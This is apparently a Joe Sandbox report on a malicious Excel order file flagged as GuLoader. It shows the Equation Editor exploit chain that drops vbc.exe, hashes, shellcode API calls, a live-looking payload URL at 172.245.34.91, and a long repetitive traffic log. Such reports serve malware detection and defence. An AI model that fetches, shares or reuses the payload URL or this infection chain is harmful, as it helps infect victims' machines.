Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ACP-2210825ORDER.xls

Overview

General Information

Sample Name:ACP-2210825ORDER.xls
Analysis ID:755822
MD5:6c84860292e2a4d210396b7012be9b8a
SHA1:7061c26320bf8836b55ac660860fa0937ae8f48e
SHA256:cadae8bf6a2bcf1ee630695a250a481d22d0b6d409832f60070b118dfc3bca75
Tags:xls
Infos:

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Antivirus / Scanner detection for submitted sample
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Antivirus detection for dropped file
Yara detected GuLoader
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Shellcode detected
Office equation editor drops PE file
Tries to detect virtualization through RDTSC time measurements
Office equation editor establishes network connection
Drops PE files to the user root directory
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Stores files to the Windows start menu directory
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Downloads executable code via HTTP
Abnormal high CPU Usage
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Contains functionality to download and execute PE files
Office Equation Editor has been started
Contains functionality to download and launch executables
Document contains embedded VBA macros
PE file contains more sections than normal
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 1036 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • EQNEDT32.EXE (PID: 1168 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 1136 cmdline: "C:\Users\Public\vbc.exe" MD5: 7081C4822CF1C7572DD82822B8F27C49)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.1187007837.00000000030C0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

    Sigma Signatures

    Exploits

    barindex
    Sigma detected: EQNEDT32.EXE connecting to internet
    Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 172.245.34.91, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1168, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49173
    Sigma detected: File Dropped By EQNEDT32EXE
    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1168, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\VBC[1].exe

    Snort Signatures

    No Snort rule has matched

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Multi AV Scanner detection for submitted file
    Source: ACP-2210825ORDER.xlsVirustotal: Detection: 26%Perma Link
    Antivirus / Scanner detection for submitted sample
    Source: ACP-2210825ORDER.xlsAvira: detected
    Antivirus detection for URL or domain
    Source: http://172.245.34.91/5643/VBC.exeAvira URL Cloud: Label: malware
    Antivirus detection for dropped file
    Source: C:\Users\user\AppData\Local\Temp\~DF688530565CAD41F4.TMPAvira: detection malicious, Label: EXP/CVE-2017-11882.Gen

    Exploits

    barindex
    Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
    Office equation editor establishes network connection
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 172.245.34.91 Port: 80
    Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Source: C:\Users\Public\vbc.exeCode function: 5_2_00406555 FindFirstFileW,FindClose,
    Source: C:\Users\Public\vbc.exeCode function: 5_2_00405A03 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,
    Source: C:\Users\Public\vbc.exeCode function: 5_2_0040287E FindFirstFileW,

    Software Vulnerabilities

    barindex
    Shellcode detected
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035406CF URLDownloadToFileW,ShellExecuteW,ExitProcess,
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035406FD ShellExecuteW,ExitProcess,
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03540660 LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess,
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035405D4 URLDownloadToFileW,ShellExecuteW,ExitProcess,
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035405F0 URLDownloadToFileW,ShellExecuteW,ExitProcess,
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0354067A URLDownloadToFileW,ShellExecuteW,ExitProcess,
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035405BB ExitProcess,
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03540722 ExitProcess,
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035406E8 ShellExecuteW,ExitProcess,
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
